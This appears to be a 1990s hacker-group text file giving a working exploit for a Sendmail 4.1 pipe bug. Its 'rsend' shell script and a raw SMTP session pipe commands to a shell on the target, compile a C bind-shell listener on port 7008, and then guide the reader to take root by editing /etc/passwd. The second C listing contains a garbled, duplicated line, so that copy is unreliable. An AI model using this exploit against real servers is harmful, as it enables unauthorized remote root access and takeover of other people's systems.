..:-={{Collaborative Security Information Center}}=-:..
          X-TREME & TECHNOTRONIC Security Collaboration Project
     http://www.technotronic.com  -=©=-  http://www.x-treme.abyss.com

Sendmail: 4.1

By Lineman

It allows remote access as bin...and since bin owns the /etc dir you
can gain root.

Rsend needs mconnect, which is a binary, which just connects to the place 
and sends the data.  You can get rid the of ()'s at the beginninga and end 
of the script, and get rid of the mconnect line, and run like ./rsend > 
file, then ascii U/L the file to port 25...If it says a lot of stuff like 
"Command Ununown" 25 times, then it didn't work.

Here's rsend:
#!/bin/sh
# Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com)
#
# This material is copyrighted by Scott Chasin, 1992, 1993. The
# usual standard disclaimer applies, especially the fact that the
# author is not liable for any damages caused by direct or indirect
# use of the information or functionality provided by this program.
#
# Description:
#
# Exploit NEW sendmail hole  and bind a port so we can spawn a program.
# Not for distribution under any circumstances
#
# Usage: smail <hostname> <target-user-name> <target-port> <shell command>
# default: smail <localhost> <daemon> <7001> </bin/sh>

port=$3
user=$2
cmd=$4
#
# Usage: smail <hostname> <target-user-name> <target-port> <shell command>
# default: smail <localhost> <daemon> <7001> </bin/sh>

port=$3
user=$2
cmd=$4

if [ -z "$2" ]; then
   user=daemon
fi

if [ -z "$3" ]; then
   port=7002
fi

if [ -z "$4" ]; then
   cmd="/bin/csh -i"
fi

(
sleep 4
echo "helo"
echo "mail from: |"
echo "rcpt to: bounce"
echo "data"
echo "."
sleep 3
echo "mail from: $user"
echo "rcpt to: | sed '1,/^$/d' | sh"
echo "data"
echo "cat > /tmp/a.c <<EOF"
cat <<  EOF
#include <sys/types.h>
#include <sys/signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
int **av;{struct sockaddr_in mya;struct servent *sp
;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
(0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
goto loop;}                                          
EOF
echo "EOF"
echo "cd /tmp"
echo "/bin/cc /tmp/a.c"
echo "/bin/rm a.c"
echo "/tmp/a.out $port $cmd"
echo "."
echo "quit"
) | mconnect $1

Or you can also ul this to port 25.  
BTW, it gets you in by running a program that listens to port 7008...
you telnet to port 7008. You can then proceed to create new users in 
/etc/passwd because you own the /etc dir...you need to type a ; after every 
command, and it gives you 1 error every command...ignore it. The process
may be noticed by a few admins.

helo
mail from: |
rcpt to: bounce
data
.
mail from: bin
rcpt to: | sed '1,/^$/d' | sh
data
cat > /tmp/a.c <<EOF
#include <sys/types.h>
#include <sys/signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
int **av;{struct sockaddr_in mya;struct servent *sp
;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
,0))<0)goto loop;if(fork()
==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
(0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
goto loop;}                                          
EOF
cd /tmp
/bin/cc /tmp/a.c
/bin/rm a.c
/tmp/a.out 7008 /bin/sh
.
quit